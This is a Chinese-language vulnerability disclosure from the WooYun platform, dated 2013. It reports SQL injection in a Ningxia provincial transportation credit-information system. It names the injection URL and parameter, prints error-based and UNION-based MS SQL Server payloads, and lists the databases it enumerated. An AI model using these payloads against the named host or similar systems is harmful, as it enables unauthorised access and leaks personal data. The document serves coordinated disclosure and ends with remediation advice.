漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-026898
漏洞标题:宁夏交通运输厅 - 企业信用系统sql注入,导致企内部信息泄露
相关厂商:宁夏交通运输厅
漏洞作者: 霍大然
提交时间:2013-06-26 10:44
修复时间:2013-08-10 10:45
公开时间:2013-08-10 10:45
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-26: 细节已通知厂商并且等待厂商处理中
2013-06-30: 厂商已经确认,细节仅向厂商公开
2013-07-10: 细节向核心白帽子及相关领域专家公开
2013-07-20: 细节向普通白帽子公开
2013-07-30: 细节向实习白帽子公开
2013-08-10: 细节向公众公开
简要描述:
交通运输厅组织开发的全省公路建设市场信用信息管理系统。部级平台互联互通的省级公路建设市场信用信息管理系统(简称省级平台),负责发布二级及以下资质公路工程从业企业的基本情况、奖惩记录、信用评价结果,并向部级平台报送从业企业奖惩信息、信用评价结果、重点公路建设项目信息等。
该系统出现SQL注入漏洞,导致用户信息泄密
详细说明:
注入点:
http://119.60.11.43:8000/pagefolder/zcfgquery.aspx
参数:item
Place: GET
Parameter: item
Type: error-based
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: item=aaa' AND 9076=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR(119)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (9076=9076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(104)+CHAR(99)+CHAR(58))) AND 'EWuP'='EWuP
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: item=aaa' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(122)+CHAR(119)+CHAR(121)+CHAR(58)+CHAR(83)+CHAR(83)+CHAR(116)+CHAR(119)+CHAR(74)+CHAR(107)+CHAR(110)+CHAR(79)+CHAR(115)+CHAR(122)+CHAR(58)+CHAR(105)+CHAR(104)+CHAR(99)+CHAR(58), NULL--
available databases [5]:
[*] BMMIS2011
[*] master
[*] model
[*] msdb
[*] tempdb
漏洞证明:
好像是身份证号吧:
密码什么的就不截图了
修复方案:
SQL注入吗,就那么几招,过滤、变量参数化、存储过程
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2013-06-30 22:22
厂商回复:
最新状态:
暂无